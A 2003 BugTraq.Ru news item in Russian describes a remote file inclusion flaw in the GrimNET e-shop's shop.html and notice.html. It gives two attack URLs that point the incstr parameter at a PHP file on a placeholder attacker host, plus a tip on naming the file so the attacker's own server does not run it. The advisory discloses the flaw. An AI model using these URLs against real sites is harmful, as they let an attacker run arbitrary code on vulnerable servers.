BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2003/10/37.html

Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Не представляю, насколько актуальна эта самая корейская система электронных магазинов, но дырка любопытна и сама по себе.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/37.html]

Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru    
теги: .net  |  предложить новость  |  обсудить  |  все отзывы (0) [4035]
назад «  » вперед

аналогичные материалы
Взлом 180 тысяч ASP.Net сайтов через sql-инъекции // 21.10.11 00:22
Плагин MS ставил под удар пользователей FireFox // 17.10.09 01:57
Октябрьские обновления от MS // 14.10.09 00:19
Августовские обновления от MS // 11.08.09 22:40
Microsoft представила новый язык программирования // 11.05.09 21:10
Обход защиты памяти в Vista // 12.08.08 02:11
Эти страшные NULL-pointerы // 05.05.08 22:24
 
последние новости
Бэкдор в xz/liblzma, предназначенный для атаки ssh-серверов // 30.03.24 17:23
Три миллиона электронных замков готовы открыть свои двери // 22.03.24 20:22
Doom на газонокосилках // 28.02.24 17:19
Умер Никлаус Вирт // 04.01.24 14:05
С наступающим // 31.12.23 23:59
Четверть приложений, использующих Log4j, до сих пор уязвима // 11.12.23 18:29
Google Drive находит файлы // 07.12.23 01:46





  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach